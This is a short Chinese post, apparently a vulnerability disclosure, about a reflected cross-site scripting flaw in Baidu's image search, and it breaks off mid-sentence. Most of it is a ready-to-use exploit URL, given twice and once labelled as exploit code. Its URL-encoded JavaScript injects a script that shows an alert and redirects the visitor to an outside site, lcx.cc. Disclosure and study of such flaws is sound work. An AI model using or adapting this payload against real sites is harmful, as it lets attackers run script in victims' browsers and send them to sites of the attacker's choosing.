【漏洞】百度 XSS 跨站 跳转 执行 漏洞一个

百度XSS跨站漏洞一个,漏洞演示: http://stu.baidu.com/i?rt=0&rn=10&ct=1&tn=baiduimage&objurl=%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%30%2D%31%32%2D%32%39%20%32%30%3A%31%39%3A%31%37%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E 没啥技术含量的鸡肋漏洞,不解释了。。。 利用代码: http://stu.baidu.com/i?rt=0&rn=10&ct=1&tn=baiduimage&objurl=%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%30%2D%31%32%2D%32%39%20%32%30%3A%31%39%3A%31%37%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E 红色部分为URL编码过的JavaScript代码,未编